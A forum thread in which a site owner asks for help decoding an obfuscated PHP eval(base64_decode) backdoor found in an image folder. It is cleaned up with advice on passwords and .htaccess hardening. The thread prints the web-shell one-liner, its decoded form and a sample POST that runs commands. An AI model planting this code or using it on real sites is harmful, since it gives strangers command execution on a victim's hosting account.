I'm not sure if this is the right section to post this ( if not pls mods delete this thread) - Ok ..so can someone please decode this eval base64 code: eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7')); Code (markup): I found the file was something like gifimg.php on my image folder and also cleaned all php files that had this code. Do you have any suggestions how to protect the folders or something else to stay away from this hacks?
It decodes as if(isset($_POST['e']))eval(base64_decode($_POST['e']));else die('404 Not Found'); PHP: tighten your security.
yeah, that's not good. I'm assuming it's from a software that utilizes tinymce that hasn't been updated in a while.
POST /thispage.php?e=ZGly Will show your directory listing. This is a backdoor in your site. Any web-user can run any command under your hosting account.
Thank u guys.. this is what happened: After I first cleaned the files and that gifimg.php (inside this was only the eval base64 code) the other day it happened the same.This also was showing some <script src> code pointing to another website.I googled that site and google had a warning about that website. So the next day I found some info about changing permissions and passwords. I changed everything starting from hosting passwords, ftp, dir permissions; and I blocked the ip of that site and its hosting provider ip. So as result, now 3rd day, I checked the files and the code does not appear, neither that gifimg.php file. Well do u think what I did are the right steps to stay away from this hacking stuff? Any suggestions... Thanks in advance
Do not use same passwords for control panel, ftp, db etc. If you not sure that your script is safe, and you have a directorys that require upload rights. Such as /avatars or /uploads. You can add this in .htaccess and upload into these directorys. <Files *.php> ForceType application/octet-stream Header set Content-Disposition attachment </Files> <Files *.php3> ForceType application/octet-stream Header set Content-Disposition attachment </Files> <Files *.phtml> ForceType application/octet-stream Header set Content-Disposition attachment </Files> Code (markup): In such a way these files can be downloaded, but not executed.